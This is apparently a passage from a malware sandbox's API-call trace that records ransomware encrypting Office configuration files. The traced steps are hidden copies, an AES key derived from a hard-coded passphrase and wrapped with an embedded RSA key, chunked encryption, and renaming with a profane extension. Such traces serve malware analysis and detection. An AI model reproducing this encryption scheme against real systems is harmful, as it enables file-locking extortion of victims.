CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.414] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.415] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml.gsg")) returned 1 [0269.418] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml.fuck")) returned 1 [0269.420] CryptDestroyHash (hHash=0x2fa5c8) returned 1 [0269.420] CryptDestroyKey (hKey=0x2fa888) returned 1 [0269.420] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.420] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.420] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0269.420] GetLastError () returned 0x0 [0269.420] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup.exe_rules.xml")) returned 0x20 [0269.420] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0269.421] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.422] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.424] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0269.424] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0269.427] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0269.427] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0269.427] CryptHashData (hHash=0x2fa288, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.427] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa288, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa948) returned 1 [0269.427] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.427] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0269.427] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f259b0) returned 1 [0269.428] CryptImportPublicKeyInfo (in: hCryptProv=0x2f259b0, dwCertEncodingType=0x1, pInfo=0x2f31180*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f311b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f311b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa408) returned 1 [0269.428] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0269.428] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25b48*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f25b48*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0269.428] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f25b48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f25b48*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0269.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.442] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.442] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.445] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.445] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.445] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.445] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.445] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.445] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.445] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.445] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.445] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.446] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.446] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.446] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.446] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.446] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.446] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.446] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.446] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.446] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.446] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.446] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.446] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.447] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.447] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.447] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.447] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.447] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.447] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.447] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.447] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.447] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.447] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.447] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.447] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.447] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.448] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.448] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.448] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.448] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.448] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.448] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.448] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.448] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.448] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.448] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.448] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.448] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.448] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.448] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.449] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.449] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.449] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.449] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.449] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.450] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.450] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.450] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.450] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.450] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.450] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.450] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.450] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, 